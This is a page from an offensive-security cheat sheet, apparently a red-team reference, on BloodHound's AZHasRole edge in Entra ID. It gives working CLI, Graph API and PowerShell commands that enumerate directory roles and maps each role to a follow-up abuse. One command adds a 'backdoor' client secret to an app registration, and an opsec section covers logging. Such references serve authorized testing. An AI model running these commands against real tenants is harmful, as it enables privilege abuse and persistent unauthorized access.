🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZHasRole

AZHasRole

The source principal has been assigned a specific Entra ID directory role. This edge describes the role assignment β€” abuse depends entirely on which role is held.

Applies to: User / ServicePrincipal β†’ AZRole (Entra ID directory roles)

Linux Abuse

Enumerate held roles for a principal

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad user get-member-objects --id <target-user-id> --security-enabled-only false

# Via Graph API
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s "https://graph.microsoft.com/v1.0/users/<target-user-id>/memberOf/microsoft.graph.directoryRole" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[] | {displayName, roleTemplateId}'

# For service principals
curl -s "https://graph.microsoft.com/v1.0/servicePrincipals/<object-id>/memberOf/microsoft.graph.directoryRole" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[] | {displayName, roleTemplateId}'

Get all active role assignments in tenant

curl -s "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$expand=principal,roleDefinition" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[] | {principalDisplayName: .principal.displayName, role: .roleDefinition.displayName}'

Windows Abuse

Microsoft.Graph PowerShell β€” enumerate roles

Connect-MgGraph -AccessToken <access-token>

# User roles
Get-MgUserMemberOf -UserId <target-user-id> | Where-Object {$_.'@odata.type' -eq '#microsoft.graph.directoryRole'} |
  Select-Object DisplayName, Id

# SP roles
Get-MgServicePrincipalMemberOf -ServicePrincipalId <object-id> | 
  Where-Object {$_.'@odata.type' -eq '#microsoft.graph.directoryRole'} |
  Select-Object DisplayName, Id

# All role assignments
Get-MgRoleManagementDirectoryRoleAssignment -ExpandProperty "principal,roleDefinition" |
  Select-Object @{n='Principal';e={$_.Principal.DisplayName}}, @{n='Role';e={$_.RoleDefinition.DisplayName}}

Follow-up abuse based on role held

Role Held Next Step
Global Administrator See AZGlobalAdmin
Privileged Role Administrator See AZPrivilegedRoleAdmin
User Access Administrator See AZUserAccessAdmin
Application Administrator Add secrets to any app registration
Cloud Application Administrator Add secrets to non-directory apps
Password Administrator Reset non-admin user passwords
Groups Administrator Add/remove members from any group
Exchange Administrator Access mailboxes via EWS/Graph

Application Administrator β€” add secret to any app

Connect-MgGraph -AccessToken <access-token>
Add-MgApplicationPassword -ApplicationId <object-id> -PasswordCredential @{DisplayName="backdoor"}

Opsec

  • The AZHasRole edge itself requires no action β€” it documents existing access.
  • Abuse actions taken using the role's privileges generate their own audit events.
  • PIM-eligible roles (AZRoleEligible) must be activated first before abuse β€” activation is logged.